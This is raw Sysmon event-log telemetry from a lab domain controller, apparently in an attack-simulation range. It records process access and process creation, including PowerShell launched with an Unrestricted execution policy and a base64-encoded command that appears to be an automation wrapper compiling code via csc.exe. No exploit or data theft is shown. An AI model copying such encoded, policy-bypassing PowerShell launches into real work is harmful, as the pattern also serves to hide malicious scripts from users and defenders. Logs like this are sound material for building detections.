13:54:42.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004542Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.456{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85A2-5FCF-E500-000000009101}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004541Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.456{10ACEC4A-85A1-5FCF-E300-000000009101}22281848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A2-5FCF-E500-000000009101}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF81927B7BF) 154100x80000000000000004540Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.471{10ACEC4A-85A2-5FCF-E500-000000009101}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\xlebw0a0.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000004539Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.456{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\xlebw0a0.cmdline2020-12-08 13:54:42.456 11241100x80000000000000004538Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:42.456{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\xlebw0a0.dll2020-12-08 13:54:42.456 10341000x80000000000000004537Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A2-5FCF-E400-000000009101}3872C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004536Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004535Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004534Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004533Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004532Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004531Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004530Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004529Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004528Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004527Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85A2-5FCF-E400-000000009101}3872C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004526Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.004{10ACEC4A-85A1-5FCF-E300-000000009101}22281848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A2-5FCF-E400-000000009101}3872C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66672516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b31e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b1534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b072d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b133f7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9c52(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9222(wow64) 154100x80000000000000004525Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.012{10ACEC4A-85A2-5FCF-E400-000000009101}3872C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000004524Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.988{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004523Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.988{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004661Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 